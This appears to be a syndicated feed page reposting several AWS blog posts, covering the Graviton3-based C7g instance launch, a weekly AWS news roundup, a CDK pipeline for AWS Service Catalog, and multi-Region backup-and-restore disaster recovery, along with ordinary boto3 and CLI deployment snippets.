New – Amazon EC2 C7g Instances, Powered by AWS Graviton3 Processors

Post Syndicated from Sébastien Stormacq original https://aws.amazon.com/blogs/aws/new-amazon-ec2-c7g-instances-powered-by-aws-graviton3-processors/

I am excited to announce that Amazon Elastic Compute Cloud (Amazon EC2) C7g instances, powered by the latest AWS Graviton3 processors and available in preview since re:Invent last year, are now generally available to all.

Let’s decompose the name C7g: the “C” instance family is designed for compute-intensive workloads. This is the 7th generation of this instance family. And the “g” means it is based on AWS Graviton, the silicon designed by AWS. These are the first instances powered by the latest generation of AWS Graviton, the Graviton3 processor.

As you bring more diverse workloads to the cloud, and as your compute, storage, and networking demands increase at a rapid pace, you are asking us to push the price performance boundary even further so that you can accelerate your migration to the cloud and optimize your costs. Additionally, you are looking for more energy-efficient compute options to help you reduce your carbon footprint and achieve your sustainability goals. We do this by working backwards from your requests, and innovating at a rapid pace across all levels of the AWS infrastructure. Our Graviton chips offer better performance at lower cost along with enhanced capabilities. For example, AWS Graviton3 processors offer you enhanced security with always-on memory encryption, dedicated caches for every vCPU, and support for pointer authentication.

Let’s illustrate this with numbers. When we launched Graviton2-based instances, they provided up to 40 percent better price/performance for a wide variety of workloads over comparable fifth-generation x86-based instances. We now have 12 instance families (M6g, M6gd, C6g, C6gd, C6gn, R6g, R6gd, T4g, X2gd, Im4gn, Is4gen, and G5g) that are powered by AWS Graviton2 processors that provide significant price performance benefits for a wide range of workloads. In 2021, we saw tens of thousands of AWS customers take advantage of this innovation by using Graviton2-based EC2 instances.

Our next generation, Graviton3 processors, deliver up to 25 percent higher performance, up to 2x higher floating-point performance, and 50 percent faster memory access based on leading-edge DDR5 memory technology compared with Graviton2 processors.

Graviton3 also uses up to 60 percent less energy for the same performance as comparable EC2 instances, which helps you reduce your carbon footprint.

Snap Inc, known for its popular social media services such as Snapchat and Bitmoji, adopted AWS Graviton2-based instances to optimize their price performance on Amazon EC2. Aaron Sheldon, software engineer at Snap, told us: “We trialed the new AWS Graviton3-based Amazon EC2 C7g instances and found that they provide significant performance improvements on real workloads compared to previous generation C6g instances. We are excited to migrate our Graviton2-based workloads to Graviton3, including messaging, storage, and friend graph workloads.”

The C7g instances are available in eight sizes with 1, 2, 4, 8, 16, 32, 48, and 64 vCPUs. C7g instances support configurations up to 128 GiB of memory, 30 Gbps of network performance, and 20 Gbps of Amazon Elastic Block Store (EBS) performance. These instances are powered by the AWS Nitro System, a combination of dedicated hardware and a lightweight hypervisor.

The following table summarizes the key characteristics of each instance type in this family.

Instance Name | vCPUs | Memory  | Network Bandwidth | EBS Bandwidth
c7g.medium    | 1     | 2 GiB   | up to 12.5 Gbps   | up to 10 Gbps
c7g.large     | 2     | 4 GiB   | up to 12.5 Gbps   | up to 10 Gbps
c7g.xlarge    | 4     | 8 GiB   | up to 12.5 Gbps   | up to 10 Gbps
c7g.2xlarge   | 8     | 16 GiB  | up to 15 Gbps     | up to 10 Gbps
c7g.4xlarge   | 16    | 32 GiB  | up to 15 Gbps     | up to 10 Gbps
c7g.8xlarge   | 32    | 64 GiB  | 15 Gbps           | 10 Gbps
c7g.12xlarge  | 48    | 96 GiB  | 22.5 Gbps         | 15 Gbps
c7g.16xlarge  | 64    | 128 GiB | 30 Gbps           | 20 Gbps

C7g instances are initially available in US East (N. Virginia) and US West (Oregon) AWS Regions; other Regions will be added shortly after launch.

As usual, you can purchase C7g capacity on demand, as Reserved Instances, or as Spot Instances, and you can apply your Savings Plans. The pricing details are available on the EC2 pricing page.
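
If you want to try one right away, here is a minimal boto3 sketch that launches a single c7g.large instance with the EC2 RunInstances API. The AMI ID and subnet ID are placeholders; the AMI must be an arm64 image, such as an Amazon Linux 2 arm64 AMI.

import boto3

ec2 = boto3.client("ec2", region_name="us-east-1")  # one of the launch Regions for C7g

response = ec2.run_instances(
    ImageId="ami-0123456789abcdef0",      # placeholder arm64 AMI ID
    InstanceType="c7g.large",
    MinCount=1,
    MaxCount=1,
    SubnetId="subnet-0123456789abcdef0",  # placeholder subnet
)
print(response["Instances"][0]["InstanceId"])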

I have the chance to talk with AWS customers on a daily basis, and many of my discussions are around price performance and the sustainability of their workloads. With more than 500 instance types to choose from, one question I often receive is: what are the workloads that would benefit from C7g?

You will find that C7g instances provide the best price performance within their instance families for a broad spectrum of compute-intensive workloads, including application servers, microservices, high-performance computing, electronic design automation, gaming, media encoding, and CPU-based ML inference. These instances are ideal for all Linux-based workloads, including containerized and microservices-based applications built using Amazon Elastic Kubernetes Service (EKS), Amazon Elastic Container Service (Amazon ECS), Amazon Elastic Container Registry, Kubernetes, and Docker, and written in popular programming languages such as C/C++, Rust, Go, Java, Python, .NET Core, Node.js, Ruby, and PHP.

The next question I receive is: given that Graviton instances are based on Arm architecture, how difficult is it to migrate from x86?

Graviton3 instances are supported by a broad choice of operating systems, independent software vendors, container services, agents, and developer tools, enabling you to migrate your workloads with minimal effort.

Applications and scripts written in high-level programming languages such as Python, Node.js, Ruby, Java, or PHP will typically just require a redeployment. Applications written in lower-level programming languages such as C/C++, Rust, or Go will require a re-compilation.

But you don’t always need to migrate your applications. Several managed services are based on Graviton already, such as Amazon ElastiCache, Amazon EKS, Amazon ECS, Amazon Relational Database Service (RDS), Amazon EMR, Amazon Aurora, and Amazon OpenSearch Service, so your application can benefit from Graviton with minimal effort. A French customer told me recently that they migrated a significant portion of their Amazon EMR clusters to Graviton by changing just one line in their Terraform scripts; all the rest worked as-is.

For those of you building with serverless, we have also released Graviton support for AWS Fargate and AWS Lambda, extending the price, efficiency, and performance benefits of Graviton to serverless workloads. Lambda functions using Graviton2 can see up to 34 percent better price/performance.
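
For those curious what this looks like in practice, here is a hedged boto3 sketch of creating a Lambda function that runs on Graviton by requesting the arm64 architecture. The role ARN, bucket, and key below are placeholders.

import boto3

lmb = boto3.client("lambda")

# Request the arm64 (Graviton2) architecture at creation time.
lmb.create_function(
    FunctionName="my-arm64-function",
    Runtime="python3.9",
    Role="arn:aws:iam::123456789012:role/lambda-exec-role",  # placeholder execution role
    Handler="app.handler",
    Architectures=["arm64"],
    Code={"S3Bucket": "my-deployment-bucket", "S3Key": "function.zip"},  # placeholder package
)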

Reducing the carbon footprint of your organization is also of paramount importance. Reducing the carbon footprint of cloud-based workloads is a shared responsibility between you and us. We do our part by innovating at all levels: from the materials used to build our facilities, the usage of water for cooling, and the production of renewable energy, down to inventing new silicon that is more energy efficient. To help you meet your own sustainability goals, we added a sustainability pillar to the AWS Well-Architected Framework, and we released the Customer Carbon Footprint tool. Graviton3 fits into that context. It uses up to 60 percent less energy for the same performance as comparable EC2 instances.

We do our part in this shared responsibility model, and now it is your turn. You can use our innovations and tools to help you optimize your workloads and only use the resources you need. Take the opportunity to write efficient code that uses fewer CPU cycles, less storage, or less network bandwidth. And be sure to select energy-efficient options, such as Graviton3-based instance types or managed services, when deploying your code.

To help you to get started migrating your applications to Graviton instance types today, we curated this list of technical resources. Have a look at it. To learn more about Graviton-based instances, visit the Graviton page or the C7g page and check out this video:

If you’d like to get started with Graviton-based instances for free, we also just reintroduced the free trial on T4g.small instances for up to 750 hours/month until the end of this year (December 31, 2022).

And now, go build 😉

— seb

AWS Week In Review – May 23, 2022

Post Syndicated from Sébastien Stormacq original https://aws.amazon.com/blogs/aws/aws-week-in-review-may-27-2022/

This post is part of our Week in Review series. Check back each week for a quick roundup of interesting news and announcements from AWS!

This is the right place to quickly learn about recent AWS news from last week, in about five minutes or less. This week, I have collected a couple of news items that might be of interest to you: IT professionals, developers, system administrators, or any type of builder who works with the AWS console, the CLI, or code.

Last Week’s Launches
The launches that caught my attention last week are the following:

EC2 now supports NitroTPM and SecureBoot – A Trusted Platform Module is often a discrete chip in a computer where you can store secrets and release them to the operating system only when the system is in a known good state. You typically use TPMs to store operating-system-level volume encryption keys, such as the ones used by BitLocker on Windows or LUKS on Linux. NitroTPM is a virtual TPM available on selected instance families that allows you to deploy workloads that depend on TPM functionality to EC2 instances.
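
As a rough sketch of how you would opt in, NitroTPM is enabled at the AMI level: you register an AMI with UEFI boot and TPM 2.0 support, then launch instances from it. The snapshot ID below is a placeholder.

import boto3

ec2 = boto3.client("ec2")

# Register an AMI with NitroTPM (TPM 2.0) and UEFI boot enabled.
ec2.register_image(
    Name="nitrotpm-enabled-ami",
    Architecture="x86_64",
    VirtualizationType="hvm",
    RootDeviceName="/dev/xvda",
    BlockDeviceMappings=[{"DeviceName": "/dev/xvda",
                          "Ebs": {"SnapshotId": "snap-0123456789abcdef0"}}],  # placeholder snapshot
    BootMode="uefi",
    TpmSupport="v2.0",
)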

Amazon EC2 Auto Scaling now backfills predictive scaling forecasts so you can quickly validate forecast accuracy. Predictive scaling is a capability of EC2 Auto Scaling that allows you to scale your fleet in and out based on observed usage patterns. It uses AI/ML to predict when your fleet needs more or less capacity, letting you scale in advance of the scaling event so the fleet is prepared at peak times. The new backfill shows you how predictive scaling would have scaled your fleet during the last 14 days. This allows you to quickly decide whether a predictive scaling policy is accurate for your applications by comparing the demand and capacity forecasts against actual demand immediately after you create the policy.
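
As a rough illustration of the workflow (the Auto Scaling group name is a placeholder, and this is only a sketch of the API shape), you could create a forecast-only predictive scaling policy with boto3 and then pull the forecast, including the backfilled period, to compare against actual demand:

import boto3
from datetime import datetime, timedelta

autoscaling = boto3.client("autoscaling")

# Create a predictive scaling policy in forecast-only mode (no scaling actions yet).
autoscaling.put_scaling_policy(
    AutoScalingGroupName="my-asg",
    PolicyName="cpu-predictive-policy",
    PolicyType="PredictiveScaling",
    PredictiveScalingConfiguration={
        "MetricSpecifications": [{
            "TargetValue": 50.0,
            "PredefinedMetricPairSpecification": {"PredefinedMetricType": "ASGCPUUtilization"},
        }],
        "Mode": "ForecastOnly",
    },
)

# Retrieve the forecast (including the backfilled portion) to compare against actual demand.
forecast = autoscaling.get_predictive_scaling_forecast(
    AutoScalingGroupName="my-asg",
    PolicyName="cpu-predictive-policy",
    StartTime=datetime.utcnow() - timedelta(days=14),
    EndTime=datetime.utcnow(),
)
print(forecast["LoadForecast"][0]["Values"][:5])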

AWS Backup adds support for two new managed file systems, Amazon FSx for OpenZFS and Amazon FSx for NetApp ONTAP. These additions help you meet your centralized data protection and regulatory compliance needs. You can now use AWS Backup’s policy-based capabilities to centrally protect Amazon FSx for NetApp ONTAP or Amazon FSx for OpenZFS, along with the other AWS services for storage, database, and compute that AWS Backup supports.

AWS App Mesh now supports IPv6 – AWS App Mesh is a service mesh that provides application-level networking to make it easy for your services to communicate with each other across multiple types of compute infrastructure. The new support for IPv6 allows you to support workloads running in IPv6 networks and to invoke App Mesh APIs over IPv6. This helps you meet IPv6 compliance requirements, and removes the need for complex networking configuration to handle address translation between IPv4 and IPv6.

Amazon Chime SDK now supports video background replacement and blur on iOS and Android. When you want to integrate audio and video call capabilities in your mobile applications, the Chime SDK is the easiest way to get started. It provides an easy-to-use API that uses the scalable and robust Amazon Chime backend to power your communications. For example, Slack uses Chime as the backend for communications in their apps. The Chime SDK client libraries for iOS and Android now include video background replacement and blur, which developers can use to reduce visual distractions and help increase visual privacy for mobile users.

For a full list of AWS announcements, be sure to keep an eye on the What’s New at AWS page.

Other AWS News
Some other updates and news that you may have missed:

Amazon Redshift: Ten years of continuous reinvention. This is an Amazon Redshift research paper that will be presented at a leading international forum for database researchers. The authors reflect on how far the first petabyte-scale cloud data warehouse has advanced since it was announced ten years ago.

Improve Your Security at the Edge with AWS IoT Services is a new blog post on the IoT channel. We understand the risks associated with operating at the edge and that you need additional capabilities to ensure that your data is protected. AWS IoT services can help you with end-to-end data protection, device security, and device identification to create the foundation of an expanded information security model and confidently operate at the edge.

AWS Open Source News and Updates – Ricardo Sueiras, my colleague from the AWS Developer Relations team, runs this newsletter. It brings you all the latest open-source projects, posts, and more. Read edition #113 here.

Upcoming AWS Events
CDK Day, on May 26, is a one-day, fully virtual event dedicated to the AWS Cloud Development Kit. With four versions of the CDK released (AWS, Terraform, CDK8s, and Projen), we thought the CDK deserved its own full-fledged conference. We will take one day and showcase the brightest and best of CDK from across the whole product family. Let’s talk serverless, Kubernetes, and multi-cloud all on the same day! CDK Day will take place on May 26, 2022 and will be fully virtual, live-streamed to our YouTube channel. Book your ticket now, it’s free.

The AWS Summit season is mostly over in Europe, but there are upcoming Summits in North America and the Asia Pacific Regions. Here are some virtual and in-person Summits that might be close to you:

More to come in July, August, and September.

You can register for re:MARS to get fresh ideas on topics such as machine learning, automation, robotics, and space. The conference will be in person in Las Vegas, June 21–24.

That’s all for this week. Check back next Monday for another Week in Review!

— seb

Govern CI/CD best practices via AWS Service Catalog

Post Syndicated from César Prieto Ballester original https://aws.amazon.com/blogs/devops/govern-ci-cd-best-practices-via-aws-service-catalog/

Introduction

AWS Service Catalog enables organizations to create and manage catalogs of Information Technology (IT) services that are approved for use on AWS. These IT services can include resources such as virtual machine images, servers, software, and databases to complete multi-tier application architectures. AWS Service Catalog lets you centrally manage deployed IT services and your applications, resources, and metadata, which helps you achieve consistent governance and meet your compliance requirements. In addition, this configuration enables users to quickly deploy only approved IT services.

In large organizations, as more products are created and different teams work on various products, Service Catalog management can become increasingly complicated. The following solution simplifies the provisioning of Service Catalog products by considering elements such as shared accounts, the roles or users who can launch portfolios, and tags, delivered in the form of best practices via Continuous Integration and Continuous Deployment (CI/CD) patterns.

This post demonstrates how Service Catalog Products can be delivered by taking advantage of the main benefits of CI/CD principles along with reducing complexity required to sync services. In this scenario, we have built a CI/CD Pipeline exclusively using AWS Services and the AWS Cloud Development Kit (CDK) Framework to provision the necessary Infrastructure.

Customers need the capability to consume services in a self-service manner, with services built on patterns that follow best practices, including focus areas such as compliance and security. The key tenets for these customers are the use of infrastructure as code (IaC) and CI/CD. For these reasons, we built the scalable and automated deployment solution covered in this post. Furthermore, this post is also inspired by another post from the AWS community, Building a Continuous Delivery Pipeline for AWS Service Catalog.

Solution Overview

The solution is built using a unified AWS CodeCommit repository with CDK v1 code, which manages and deploys the Service Catalog Product estate. The solution supports the following scenarios: 1) making Products available to accounts and 2) provisioning these Products directly into accounts. The configuration provides flexibility regarding which components must be deployed in accounts as opposed to making a collection of these components available to account owners/users who can in turn build upon and provision them via sharing.

Figure shows the pipeline created comprised of stages

The pipeline created is comprised of the following stages:

  1. Retrieve the code from the repository
  2. Synthesize the CDK code to transform it into a CloudFormation template
  3. Ensure the pipeline is defined correctly
  4. Deploy and/or share the defined Portfolios and Products to a hub account or multiple accounts

Deploying and using the solution

Deploy the pipeline

We have created a Python AWS Cloud Development Kit (AWS CDK) v1 application hosted in a Git Repository. Deploying this application will create the required components described in this post. For a list of the deployment prerequisites, see the project README.

Clone the repository to your local machine. Then, bootstrap and deploy the CDK stack following the next steps.

git clone https://github.com/aws-samples/aws-cdk-service-catalog-pipeline
cd aws-cdk-service-catalog
pip install -r requirements.txt
cdk bootstrap aws://account_id/eu-west-1
cdk deploy

The infrastructure creation, including the AWS CodePipeline pipelines and the repository, takes around 3-5 minutes to complete. Once CDK has deployed the components, you will have a new, empty repository in which we will define the target Service Catalog estate. To do so, clone the new repository and push our sample code into it:

git clone https://git-codecommit.eu-west-1.amazonaws.com/v1/repos/service-catalog-repo
cd service-catalog-repo
git checkout -b main
cp -aR ../cdk-service-catalog-pipeline/* .
git add .
git commit -am "First commit"
git push origin main

Review and update configuration

Our cdk.json file is used to manage context settings such as shared accounts, permissions, region to deploy, etc.

shared_accounts_ecs: AWS account IDs where the ECS portfolio will be shared
shared_accounts_storage: AWS account IDs where the Storage portfolio will be shared
roles: ARNs of the roles that will have permission to access the Portfolio
users: ARNs of the users that will have permission to access the Portfolio
groups: ARNs of the groups that will have permission to access the Portfolio
hub_account: AWS account ID where the Portfolio will be created
pipeline_account: AWS account ID where the main Infrastructure Pipeline will be created
region: the AWS Region to be used for the deployment
"shared_accounts_ecs":["012345678901","012345678902"],
    "shared_accounts_storage":["012345678901","012345678902"],
    "roles":[],
    "users":[],
    "groups":[],
    "hub_account":"012345678901",
    "pipeline_account":"012345678901",
    "region":"eu-west-1"

There are two mechanisms that can be used to create Service Catalog Products in this solution: 1) providing a CloudFormation template or 2) declaring a CDK stack (that will be transformed as part of the pipeline). Our sample contains two Products, each demonstrating one of these options: an Amazon Elastic Container Services (ECS) deployment and an Amazon Simple Storage Service (S3) product.

These Products are automatically shared with accounts specified in the shared_accounts_storage variable. Each product is managed by a CDK Python file in the cdk_service_catalog folder.

Figure shows Pipeline stages that AWS CodePipeline runs through

The Pipeline stages that AWS CodePipeline runs through are as follows:

  1. Download the AWS CodeCommit code
  2. Synthesize the CDK code to transform it into a CloudFormation template
  3. Auto-modify the Pipeline in case you have made manual changes to it
  4. Deploy and/or share the defined Portfolios and Products to a hub account in a Region or to multiple accounts

Adding new Portfolios and Products

To add a new Portfolio to the Pipeline, we recommend creating a new class under cdk_service_catalog similar to cdk_service_catalog_ecs_stack.py from our sample. Once the new class is created with the products you wish to associate, we instantiate the new class inside cdk_pipelines.py, and then add it inside the wave in the stage. There are two ways to create portfolio products. The first one is by creating a CloudFormation template, as can be seen in the Amazon Elastic Container Service (ECS) example.  The second way is by creating a CDK stack that will be transformed into a template, as can be seen in the Storage example.

Product and Portfolio definition:

from aws_cdk import core as cdk
from aws_cdk import aws_ecs as ecs
from aws_cdk import aws_servicecatalog as servicecatalog

class ECSCluster(servicecatalog.ProductStack):
    def __init__(self, scope, id):
        super().__init__(scope, id)
        # Parameters for the Product Template
        cluster_name = cdk.CfnParameter(self, "clusterName", type="String", description="The name of the ECS cluster")
        container_insights_enable = cdk.CfnParameter(self, "container_insights", type="String", default="False", allowed_values=["False", "True"], description="Enable Container Insights")
        vpc = cdk.CfnParameter(self, "vpc", type="AWS::EC2::VPC::Id", description="VPC")
        # ECS cluster provisioned when the Product is launched from Service Catalog
        ecs.Cluster(self, "ECSCluster_template", enable_fargate_capacity_providers=True, cluster_name=cluster_name.value_as_string, container_insights=bool(container_insights_enable.value_as_string), vpc=vpc)
        cdk.Tags.of(self).add("key", "value")
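
The sample repository wires Products into Portfolios through its own helper classes, so the following is only an illustrative sketch (names, account IDs, and structure are hypothetical) of how a Portfolio can reference a ProductStack using the CDK v1 servicecatalog constructs:

# Inside a Stack that defines the Portfolio (illustrative only)
portfolio = servicecatalog.Portfolio(self, "ECSPortfolio",
                                     display_name="ECS Portfolio",
                                     provider_name="Platform Team")
product = servicecatalog.CloudFormationProduct(self, "ECSClusterProduct",
    product_name="ECS Cluster",
    owner="Platform Team",
    product_versions=[servicecatalog.CloudFormationProductVersion(
        product_version_name="v1",
        cloud_formation_template=servicecatalog.CloudFormationTemplate.from_product_stack(
            ECSCluster(self, "ECSClusterTemplate")))])
portfolio.add_product(product)
portfolio.share_with_account("012345678902")  # hypothetical shared account ID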

Clean up

After completing your demo, clean up the resources created for this post by deleting the stacks with the CDK CLI:

cdk destroy --all

Conclusion

In this post, we demonstrated how Service Catalog deployments can be accelerated by building a CI/CD pipeline using self-managed services. The Portfolio & Product estate is defined in its entirety by using Infrastructure-as-Code and automatically deployed based on your configuration. To learn more about AWS CDK Pipelines or AWS Service Catalog, visit the appropriate product documentation.

Authors:

 

César Prieto Ballester

César Prieto Ballester is a Senior DevOps Consultant at AWS. He enjoys automating everything and building infrastructure using code. Apart from work, he plays electric guitar and loves riding his mountain bike.

Daniel Mutale

Daniel Mutale is a Cloud Infrastructure Architect at AWS Professional Services. He enjoys creating cloud based architectures and building out the underlying infrastructure to support the architectures using code. Apart from work, he is an avid animal photographer and has a passion for interior design.

Raphael Sack

Raphael is a technical business development manager for Service Catalog & Control Tower. He enjoys tinkering with automation and code and is an active member of the management tools community.

Disaster recovery with AWS managed services, Part 2: Multi-Region/backup and restore

Post Syndicated from Dhruv Bakshi original https://aws.amazon.com/blogs/architecture/disaster-recovery-with-aws-managed-services-part-ii-multi-region-backup-and-restore/

In part I of this series, we introduced a disaster recovery (DR) concept that uses managed services through a single AWS Region strategy. In part two, we introduce a multi-Region backup and restore approach. With this approach, you can deploy a DR solution in multiple Regions, but it will be associated with longer RPO/RTO. Using a backup and restore strategy will safeguard applications and data against large-scale events as a cost-effective solution, but will result in longer downtimes and greater loss of data in the event of a disaster as compared to other strategies as shown in Figure 1.

DR Strategies

Figure 1. DR Strategies

Implementing the multi-Region/backup and restore strategy

Using multiple Regions ensures resiliency against the most serious, widespread outages. Because Regions are isolated and geographically dispersed, a secondary Region protects workloads when they cannot run in the primary Region.

Architecture overview

The application diagram presented in Figures 2.1 and 2.2 refers to an application that processes payment transactions, which was modernized to utilize managed services in the AWS Cloud. In this post, we’ll show you which AWS services it uses and how they work to maintain multi-Region/backup and restore strategy.

These figures show how to successfully implement the backup and restore strategy and successfully fail over your workload. The following sections list the components of the example application presented in the figures, which works as follows:

Multi-Region backup

Figure 2.1. Multi-Region backup

Multi-Region restore

Figure 2.2. Multi-Region restore

Route 53

Route 53 health checks monitor the health and performance of your web applications, web servers, and other resources. Health checks are necessary for configuring DNS failover within Route 53. Once an application or resource becomes unhealthy, you’ll need to initiate a manual failover process to create resources in the secondary Region. In our architecture, we use CloudWatch alarms to automate notifications of changes in health status.
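
A minimal boto3 sketch of that pattern, assuming a placeholder domain, health-check path, and SNS topic (Route 53 publishes its health check metrics to CloudWatch in us-east-1):

import boto3

route53 = boto3.client("route53")
cloudwatch = boto3.client("cloudwatch", region_name="us-east-1")

# Health check against the primary Region's public endpoint (placeholder domain).
hc = route53.create_health_check(
    CallerReference="primary-endpoint-check-001",
    HealthCheckConfig={
        "Type": "HTTPS",
        "FullyQualifiedDomainName": "app.example.com",
        "ResourcePath": "/health",
        "RequestInterval": 30,
        "FailureThreshold": 3,
    },
)

# Alarm (and notify via a placeholder SNS topic) when the health check reports unhealthy.
cloudwatch.put_metric_alarm(
    AlarmName="primary-endpoint-unhealthy",
    Namespace="AWS/Route53",
    MetricName="HealthCheckStatus",
    Dimensions=[{"Name": "HealthCheckId", "Value": hc["HealthCheck"]["Id"]}],
    Statistic="Minimum",
    Period=60,
    EvaluationPeriods=1,
    Threshold=1,
    ComparisonOperator="LessThanThreshold",
    AlarmActions=["arn:aws:sns:us-east-1:123456789012:dr-notifications"],
)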

Please check out the Creating Disaster Recovery Mechanisms Using Amazon Route 53 blog post for additional DR mechanisms using Amazon Route 53.

Amazon EKS control plane

Amazon Elastic Kubernetes Service (Amazon EKS) automatically scales control plane instances based on load, automatically detects and replaces unhealthy control plane instances, and restarts them across the Availability Zones within the Region as needed. Because on-demand clusters are provisioned in the secondary Region, AWS also manages the control plane the same way.

Amazon EKS data plane

It is a best practice to create worker nodes using Amazon Elastic Compute Cloud (Amazon EC2) Auto Scaling groups instead of creating individual EC2 instances and joining them to the cluster. This is because Amazon EC2 Auto Scaling groups automatically replace any terminated or failed nodes, which ensures that the cluster always has the capacity to run your workload.

The Amazon EKS control plane and data plane will be created on demand in the secondary Region during an outage via infrastructure as code (IaC) such as AWS CloudFormation, Terraform, etc. You should pre-stage all networking requirements like the virtual private cloud (VPC), subnets, route tables, and gateways, and deploy the Amazon EKS cluster during an outage in the primary Region.

As shown in the Backup and restore your Amazon EKS cluster resources using Velero blog post, you may use a third-party tool like Velero for managing snapshots of persistent volumes. These snapshots can be stored in an Amazon Simple Storage Service (Amazon S3) bucket in the primary Region, which will be replicated to an S3 bucket in another Region via cross-Region replication.

During an outage in the primary Region, you can use the tool in the secondary Region to restore volumes from snapshots in the standby cluster.

OpenSearch Service

For domains running Amazon OpenSearch Service, OpenSearch Service takes hourly automated snapshots and retains up to 336 of them for 14 days. These snapshots can only be used for cluster recovery within the same Region as the primary OpenSearch cluster.

You can use OpenSearch APIs to create a manual snapshot of an OpenSearch cluster, which can be stored in a registered repository like Amazon S3. You can do this manually or create a scheduled Lambda function based on your RPO, which prompts creation of a manual snapshot that is then stored in an S3 bucket. Amazon S3 cross-Region replication will then automatically and asynchronously copy objects across S3 buckets.
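
A minimal sketch of such a Lambda function, assuming a snapshot repository named manual-snapshots has already been registered against an S3 bucket and that the domain endpoint is a placeholder (the requests and requests_aws4auth libraries must be packaged with the function):

import boto3
import requests
from requests_aws4auth import AWS4Auth

region = "us-east-1"                                          # placeholder primary Region
host = "https://search-mydomain.us-east-1.es.amazonaws.com"   # placeholder domain endpoint
repo = "manual-snapshots"                                     # pre-registered snapshot repository

credentials = boto3.Session().get_credentials()
awsauth = AWS4Auth(credentials.access_key, credentials.secret_key, region, "es",
                   session_token=credentials.token)

def handler(event, context):
    # Take a manual snapshot; S3 cross-Region replication copies it to the secondary Region.
    snapshot_name = "snapshot-" + context.aws_request_id
    resp = requests.put(f"{host}/_snapshot/{repo}/{snapshot_name}", auth=awsauth)
    resp.raise_for_status()
    return resp.json()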

You can restore OpenSearch Service clusters by creating the cluster on demand via CloudFormation and using OpenSearch APIs to restore the snapshot from an S3 bucket.

Amazon RDS Postgres

Amazon Relational Database Service (Amazon RDS) can copy continuous backups cross-Region. You can configure your Amazon RDS database instance to replicate snapshots and transaction logs to a destination Region of your choice.

If a continuous backup rule also specifies a cross-account or cross-Region copy, AWS Backup takes a snapshot of the continuous backup, copies that snapshot to the destination vault, and then deletes the source snapshot. For continuous backup of Amazon RDS, AWS Backup creates a snapshot every 24 hours and stores transaction logs every 5 minutes in-Region. The Backup Frequency setting only applies to cross-Region backups of these continuous backups. Backup Frequency determines how often AWS Backup:

  • Creates a snapshot at that point in time from the existing snapshot plus all transaction logs up to that point
  • Copies snapshots to the other Region(s)
  • Deletes the source snapshot (because it was only created to be copied)

For more information, refer to the Point-in-time recovery and continuous backup for Amazon RDS with AWS Backup blog post.
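
A minimal boto3 sketch of such a backup rule, with placeholder vault names, destination vault ARN, and schedule:

import boto3

backup = boto3.client("backup")

# Backup plan with continuous backup (PITR) for Amazon RDS and a cross-Region copy action.
backup.create_backup_plan(
    BackupPlan={
        "BackupPlanName": "rds-continuous-with-cross-region-copy",
        "Rules": [{
            "RuleName": "daily-continuous",
            "TargetBackupVaultName": "primary-vault",
            "ScheduleExpression": "cron(0 2 * * ? *)",
            "EnableContinuousBackup": True,
            "Lifecycle": {"DeleteAfterDays": 35},
            "CopyActions": [{
                "DestinationBackupVaultArn": "arn:aws:backup:us-west-2:123456789012:backup-vault:dr-vault",
                "Lifecycle": {"DeleteAfterDays": 35},
            }],
        }],
    }
)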

ElastiCache

You can use the backup, copy, and export API calls for Amazon ElastiCache to develop a snapshot and restore strategy in a secondary Region. You can either prompt a manual backup and copy that backup to an S3 bucket, or create a pair of Lambda functions that run on a schedule to meet the RPO requirements. The Lambda functions prompt a manual backup, which is then exported as an .rdb file to an S3 bucket. Amazon S3 cross-Region replication will then handle the asynchronous copy of the backup to an S3 bucket in a secondary Region.
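
A rough boto3 sketch of those two calls (names and bucket are placeholders; the export requires the bucket to grant ElastiCache the documented permissions):

import boto3

elasticache = boto3.client("elasticache", region_name="eu-west-1")  # placeholder primary Region

# 1) Take a manual backup of the Redis replication group (names are placeholders).
elasticache.create_snapshot(
    ReplicationGroupId="my-redis-cluster",
    SnapshotName="my-redis-backup-2022-05-23",
)

# 2) Once the snapshot is "available" (poll describe_snapshots), export it as an
#    .rdb file to an S3 bucket; S3 cross-Region replication copies it onward.
elasticache.copy_snapshot(
    SourceSnapshotName="my-redis-backup-2022-05-23",
    TargetSnapshotName="my-redis-backup-2022-05-23-export",
    TargetBucket="my-primary-region-backup-bucket",
)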

You can use CloudFormation to create an ElastiCache cluster on demand and use CloudFormation properties such as SnapshotArns and SnapshotName to point to the desired ElastiCache backup stored in Amazon S3 to seed the cluster in the secondary Region.

Amazon Redshift

Amazon Redshift takes automatic, incremental snapshots of your data periodically and saves them to Amazon S3. Additionally, you can take manual snapshots of your data whenever you want.

To precisely control when snapshots are taken, you can create a snapshot schedule and attach it to one or more clusters. You can also configure cross-Region snapshot copy, which will automatically copy all your automated and manual snapshots to another Region.

During an outage, you can create the Amazon Redshift cluster on demand via CloudFormation and use CloudFormation properties such as SnapshotIdentifier to restore the new cluster from that snapshot.
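
Equivalently, if you restore through the API instead of CloudFormation, the call is a one-liner (identifiers are placeholders):

import boto3

redshift = boto3.client("redshift", region_name="eu-west-1")  # secondary Region

# Restore a new cluster from a snapshot that cross-Region snapshot copy placed here.
redshift.restore_from_cluster_snapshot(
    ClusterIdentifier="analytics-cluster-dr",
    SnapshotIdentifier="rs:analytics-cluster-2022-05-22-02-00-00",  # placeholder copied snapshot
)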

Note: You can add an additional layer of protection to your backups through AWS Backup Vault Lock, S3 Object Lock, and Encrypted Backups.

Conclusion

With greater adoption of managed services within the cloud, there is a need to think of creative ways to implement a cost-effective DR solution. The backup and restore approach offered in this post lowers costs by accepting more lenient RPO/RTO requirements, while still allowing you to utilize AWS managed services.

In the next post, we will discuss a multi-Region active/active strategy for the same application stack illustrated in this post.

Other posts in this series

Related information

Looking for more architecture content? AWS Architecture Center provides reference architecture diagrams, vetted architecture solutions, Well-Architected best practices, patterns, icons, and more!

Perestroika, trolls!

Post Syndicated from original https://bivol.bg/%D0%BF%D0%B5%D1%80%D0%B5%D1%81%D1%82%D1%80%D0%BE%D0%B9%D0%BA%D0%B0-%D1%82%D1%80%D0%BE%D0%BB%D0%BE%D0%B2%D0%B5.html

Monday, May 23, 2022


It is not easy to pull your head out of your own ass. Let me give a personal example. For close to five five-year stretches I gambled. I won, I lost, I went around in a vicious circle. You can never beat the casino.…

Enable Amazon QuickSight federation with Google Workspace

Post Syndicated from Sriharsh Adari original https://aws.amazon.com/blogs/big-data/enable-amazon-quicksight-federation-with-google-workspace/

